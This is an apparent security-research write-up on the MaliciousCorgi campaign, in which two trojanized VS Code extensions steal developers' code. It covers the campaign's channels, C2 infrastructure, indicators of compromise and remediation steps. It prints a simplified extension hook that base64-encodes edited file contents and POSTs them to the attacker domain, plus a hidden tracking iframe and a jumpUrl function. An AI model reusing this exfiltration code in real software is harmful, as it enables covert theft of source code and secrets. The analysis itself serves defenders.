MaliciousCorgi: The IDE Supply Chain Attack That Hit 1.5 Million Developers

Table of Contents

• Executive Summary
• The Vectors: Hiding in Plain Sight
• Technical Breakdown: The "Triple Theft" Architecture
  • Channel 1: The Real-Time Feed (Event-Driven Exfiltration)
  • Channel 2: Server-Controlled Mass Harvesting
  • Channel 3: The Profiling Engine (Webview Abuse)
• The jumpUrl Mechanism: A Path to RCE
• Infrastructure and Attribution
  • Domain and Network Infrastructure
  • Persona Analysis
• Indicators of Compromise
  • Extension Identifiers
  • Network Indicators
  • Behavioral Indicators
  • File System Artifacts
• Immediate Remediation for DevSecOps
  • Step 1: Identify Affected Systems
  • Step 2: Rotate All Credentials
  • Step 3: Network Blocking
  • Step 4: Review Logs and Telemetry
  • Step 5: Long-Term Mitigations
• Conclusion

Executive Summary

In a massive blow to the "Shift Left" security philosophy, researchers at Koi Security have uncovered a sophisticated espionage campaign embedded directly within the tools developers trust most. Dubbed MaliciousCorgi, this campaign successfully compromised over 1.5 million developers through two Trojanized Visual Studio Code extensions, exfiltrating source code, environment variables, and intellectual property to servers in China.

This wasn't a drive-by download or a phishing link. It was a functional parasite living inside the IDE.

The attack represents a fundamental evolution in supply chain compromise tactics. Rather than targeting package managers like npm or PyPI—which have received significant security investment in recent years—the threat actors recognized that the IDE itself represents an even more privileged position. An extension with access to the VS Code API can observe every keystroke, every file opened, and every secret pasted into a terminal. It's the ultimate reconnaissance platform, and until now, it has operated largely outside the security perimeter.

The MaliciousCorgi campaign demonstrates that the "Shift Left" movement, which aims to embed security earlier in the development lifecycle, has inadvertently created new attack surfaces. By bringing security tools into the developer's workspace, organizations have also normalized the presence of third-party code with elevated privileges—code that most developers install without a second thought.

The Vectors: Hiding in Plain Sight

The attack leveraged two extensions published under the names whensunset and zhukunpeng:

Extension Name	Extension ID	Installs	Primary Function
ChatGPT – 中文版	whensunset.chatgpt-china	1,340,000	ChatGPT interface for Chinese users
ChatMoss / CodeMoss	zhukunpeng.chat-moss	151,751	AI-powered code assistant

Both extensions functioned exactly as advertised, providing AI-powered code suggestions and chat interfaces. This utility was the perfect camouflage. By solving a real user pain point—accessing ChatGPT in restricted regions or via a convenient UI—the attackers secured a persistent foothold on developer workstations without raising suspicion.

The targeting was surgical. Chinese developers, often working behind the Great Firewall with limited access to Western AI services, represented an ideal victim pool. They were motivated to seek alternative interfaces to ChatGPT, making them highly receptive to extensions that promised to bridge this gap. The attackers didn't need to compromise an existing popular extension; they simply built something people wanted and bundled the malware inside.

This approach sidesteps the typical "trust injection" problem faced by supply chain attackers. Instead of hijacking an existing trusted package (which risks detection during code review or version diff analysis), MaliciousCorgi established trust from day one by delivering genuine value.

Technical Breakdown: The "Triple Theft" Architecture

Unlike typical malware that might scan for specific wallet files or credentials upon installation, MaliciousCorgi implemented a continuous surveillance loop described as the "Triple Theft Channels." This architecture ensured comprehensive coverage across different data access patterns, from real-time keylogging to bulk exfiltration.

Channel 1: The Real-Time Feed (Event-Driven Exfiltration)

The extensions hooked into the VS Code API's onDidChangeTextDocument event listener. This allowed the malware to capture file content the moment it was opened or edited—before it was even saved to disk or committed to Git.

// Simplified representation of the malicious hook
vscode.workspace.onDidChangeTextDocument((event) => {
  const document = event.document;
  const content = document.getText();

  // Encode to bypass simple string-matching NIDS
  const encoded = Buffer.from(content).toString('base64');

  // Exfiltrate immediately
  fetch('https://aihao123.cn/api/collect', {
    method: 'POST',
    body: JSON.stringify({
      filename: document.fileName,
      content: encoded,
      timestamp: Date.now()
    })
  });
});

Key characteristics of this channel:

• Mechanism: vscode.workspace.onDidChangeTextDocument triggers the payload on every edit
• Obfuscation: Content is immediately encoded in Base64 to bypass simple string-matching Network Intrusion Detection Systems (NIDS)
• Destination: The encoded payload is POSTed to aihao123[.]cn
• Timing: Exfiltration occurs before the file is saved, capturing ephemeral content

This means that if a developer pasted an AWS secret key into a file and deleted it 10 seconds later, the key was likely already exfiltrated. The traditional advice of "don't commit secrets to Git" is irrelevant here—the malware operates at a layer below version control.

Channel 2: Server-Controlled Mass Harvesting

Complementing the real-time feed was a command-and-control (C2) channel capable of "smash and grab" operations. The extension maintained a persistent connection to the C2 server via Server-Sent Events (SSE), which could issue commands to scan the local workspace.

Capabilities of the C2 channel:

• Batch Exfiltration: The server could trigger the exfiltration of up to 50 files at a time
• Smart Targeting: The malware specifically targeted source code (.js, .ts, .py, .go), configuration files (.env, .config, .yml), and documentation, while ignoring binary assets to save bandwidth
• On-Demand Activation: The C2 could remain dormant during initial infection, activating mass harvesting only after confirming a high-value target

This dual-channel approach—passive real-time monitoring combined with active bulk collection—ensured that attackers could adapt their collection strategy based on what they observed. A developer working on a sensitive project might trigger escalated collection, while a hobbyist's machine might only warrant passive monitoring.

Channel 3: The Profiling Engine (Webview Abuse)

Perhaps the most anomalous feature was the use of a hidden zero-pixel iframe within the extension's sidebar Webview. This iframe loaded a page containing four distinct commercial analytics SDKs:

Analytics Provider	Purpose
Zhuge.io	Behavioral analytics and user journey tracking
GrowingIO	Product analytics and conversion optimization
TalkingData	Mobile and cross-platform user profiling
Baidu Analytics	Web analytics with deep Chinese internet integration

The intent behind this redundancy: This suggests a high-priority effort to fingerprint the infected device and correlate the developer's identity across different digital personas. If the developer was logged into other Chinese services on the same machine, these trackers could potentially link the stolen code to a real-world identity.

The zero-pixel iframe is a classic web tracking technique, but its deployment within a VS Code extension represents a novel abuse of the Webview API. Most developers would never suspect that their code editor is running invisible browser sessions in the background.

<!-- Hidden tracking iframe embedded in extension Webview -->
<iframe
  src="https://mossbotstatic.aihao123.cn/track"
  style="width:0;height:0;border:none;position:absolute;"
></iframe>

This profiling capability transforms MaliciousCorgi from a simple data thief into an intelligence collection platform. The attackers aren't just stealing code—they're building dossiers on developers, correlating their work with their online identities, and potentially identifying high-value targets for further exploitation.

The jumpUrl Mechanism: A Path to RCE

Beyond passive theft, the malware contained a jumpUrl command. This function allows the C2 server to force the victim's machine to open a specific URL in the default system browser.

// Simplified jumpUrl implementation
function handleJumpUrl(url) {
  vscode.env.openExternal(vscode.Uri.parse(url));
}

While the vscode.env.openExternal API is designed for legitimate use cases like opening documentation, in the hands of an attacker it presents severe risks:

Drive-by Downloads: The C2 could direct users to malicious payloads hosted on compromised or attacker-controlled sites. Combined with browser zero-days, this could achieve code execution outside the VS Code sandbox.

Session Hijacking: By forcing the browser to malicious OAuth consent screens while the user is already authenticated to corporate cloud providers (AWS, GCP, Azure, GitHub), attackers could trick users into granting access to their cloud resources. The developer, accustomed to OAuth prompts from development tools, might approve without scrutiny.

Watering Hole Delivery: The jumpUrl could be triggered selectively—only activating for developers at specific companies identified through the profiling engine. This enables highly targeted attacks that evade broad detection.

Visual Distraction: During active exfiltration, the C2 might open fake "release notes" or "update notifications" to provide a plausible explanation for any observed network activity, training the user to ignore suspicious behavior.

The presence of this capability suggests that MaliciousCorgi was designed not just for passive collection, but as a beachhead for deeper compromise. The extension could serve as an initial access vector, with the jumpUrl mechanism enabling second-stage payload delivery.

Infrastructure and Attribution

The campaign's infrastructure is centralized around the domain aihao123[.]cn, which hosts the C2 endpoints and the SSE subdomains used for persistent connections.

Domain and Network Infrastructure

Asset	Purpose	Hosting
aihao123[.]cn	Primary C2 domain	Tencent Cloud
sse.aihao123[.]cn	Server-Sent Events endpoint	Alibaba Cloud
chatmoss-v2.aihao123[.]cn	Secondary API endpoint	Tencent Cloud
mossbotstatic.aihao123[.]cn	Static assets and tracking	Alibaba Cloud

The underlying IPs resolve to Tencent Cloud and Alibaba Cloud, consistent with domestic Chinese actors. The use of legitimate cloud providers rather than bulletproof hosting suggests confidence that the operation would not be quickly detected and reported.

Persona Analysis

The publisher whensunset maintains a GitHub profile presenting as a student in Beijing interested in "new technology and science fiction." This persona:

• Has a multi-year commit history on legitimate open-source projects
• Follows typical developer interests and communities
• Shows no obvious indicators of malicious intent

This careful persona construction deflects attribution toward amateur enthusiasm rather than state-sponsored espionage. However, the sophistication of the malware—particularly the triple-channel architecture and profiling engine—is inconsistent with a student hobbyist project.

The zhukunpeng account follows a similar pattern, with just enough legitimate activity to appear credible but no verifiable real-world identity.

Whether MaliciousCorgi represents a state-sponsored operation, a criminal enterprise, or an entrepreneurial data broker remains unclear. The targeting of Chinese developers and the use of domestic cloud infrastructure could suggest internal surveillance, competitive intelligence gathering, or preparation for future supply chain attacks against Western companies that employ Chinese developers.

Indicators of Compromise

Extension Identifiers

Identifier Type	Value
Extension ID (Primary)	whensunset.chatgpt-china
Extension ID (Secondary)	zhukunpeng.chat-moss
Publisher (Primary)	whensunset
Publisher (Secondary)	zhukunpeng

Network Indicators

Domain/Subdomain	Type	Purpose
aihao123[.]cn	Domain	Primary C2
sse.aihao123[.]cn	Subdomain	SSE persistent connection
chatmoss-v2.aihao123[.]cn	Subdomain	API endpoint
mossbotstatic.aihao123[.]cn	Subdomain	Static assets/tracking

Behavioral Indicators

• High-volume HTTP POST traffic from VS Code process to Chinese IP ranges
• Persistent SSE connections from developer workstations
• VS Code process making requests to analytics providers (Zhuge.io, GrowingIO, TalkingData, Baidu)
• Base64-encoded payloads in outbound POST requests containing file paths

File System Artifacts

Extensions are installed to:

• Windows: %USERPROFILE%\.vscode\extensions\
• macOS: ~/.vscode/extensions/
• Linux: ~/.vscode/extensions/

Look for directories matching:

• whensunset.chatgpt-china-*
• zhukunpeng.chat-moss-*

Immediate Remediation for DevSecOps

If you or your team have these extensions installed, uninstalling them is not enough. The extensions have had read-access to your unencrypted secrets for months. Assume compromise and act accordingly.

Step 1: Identify Affected Systems

# Check for malicious extensions on macOS/Linux
ls -la ~/.vscode/extensions/ | grep -E "(whensunset|zhukunpeng)"

# Check VS Code's installed extensions list
code --list-extensions | grep -E "(chatgpt-china|chat-moss)"

For enterprise environments, query endpoint telemetry for:

• Extension installation events matching the malicious IDs
• Network connections to aihao123[.]cn and subdomains

Step 2: Rotate All Credentials

Assume all secrets on the infected machine are compromised. This includes:

• API keys (AWS, GCP, Azure, Stripe, Twilio, etc.)
• SSH keys (regenerate and replace on all servers)
• Database credentials
• OAuth tokens and refresh tokens
• Personal access tokens (GitHub, GitLab, npm, etc.)
• Environment variables from .env files
• Kubernetes secrets that were viewed locally

Prioritize rotation based on the sensitivity of systems accessed from the compromised workstation.

Step 3: Network Blocking

Implement the following blocks at the corporate firewall level:

# Block primary C2 domain and all subdomains
*.aihao123.cn
aihao123.cn

# Specific subdomains observed
sse.aihao123.cn
chatmoss-v2.aihao123.cn
mossbotstatic.aihao123.cn

Consider blocking or monitoring traffic to the analytics providers used for fingerprinting, though this may have legitimate business impact.

Step 4: Review Logs and Telemetry

• Network logs: Check for high-volume HTTP POST traffic to Chinese IP ranges from developer VLANs
• Endpoint logs: Look for VS Code processes making unusual network connections
• Cloud audit logs: Review for unauthorized API calls or resource access that may indicate credential use
• Git hosting logs: Check for unusual clone or access patterns

Step 5: Long-Term Mitigations

1. Extension Allowlisting: Implement organizational policies that restrict which VS Code extensions can be installed
2. Network Segmentation: Isolate developer workstations from production credential access
3. Secret Management: Use secret managers (HashiCorp Vault, AWS Secrets Manager) rather than local .env files
4. Extension Auditing: Establish a review process for new extensions before organization-wide adoption

Conclusion

MaliciousCorgi proves that the IDE is the new endpoint. Security teams have invested heavily in scanning code (SAST), analyzing dependencies (SCA), and securing CI/CD pipelines. But the tools used to write that code have operated in a trust vacuum.

A compromised extension doesn't just steal code—it effectively grants a threat actor a seat in your engineering team. They see what you see, when you see it. They watch you paste secrets, review sensitive designs, and access production systems. The traditional security perimeter, already eroded by remote work and cloud adoption, now has a hole that leads directly into the developer's workspace.

The MaliciousCorgi campaign should serve as a wake-up call for several uncomfortable truths:

Extension marketplaces are not secure by default. The VS Code Marketplace, like npm and PyPI before it, relies primarily on community reporting rather than proactive security scanning. Malicious extensions can operate for months or years before detection.

Functional malware is harder to detect. Unlike traditional malware that exhibits purely malicious behavior, MaliciousCorgi delivered genuine value to users. This "trojan utility" model will likely become more common as attackers recognize the benefits of building trust through functionality.

Developer workstations are high-value targets. A single compromised developer can provide access to source code, production credentials, customer data, and internal communications. The ROI on targeting developers far exceeds traditional endpoint compromise.

"Shift Left" created new attack surfaces. By bringing security into the development workflow, organizations normalized the presence of third-party tools with elevated privileges. Attackers are now exploiting this normalization.

The path forward requires treating developer tools with the same scrutiny applied to production infrastructure. Extension installation should require approval. Network traffic from development environments should be monitored. And organizations must recognize that the humans writing the code are often the weakest—and most valuable—link in the security chain.

---

This analysis is based on research published by Koi Security in January 2026. Organizations are encouraged to review the original disclosure for additional technical details and updated indicators of compromise.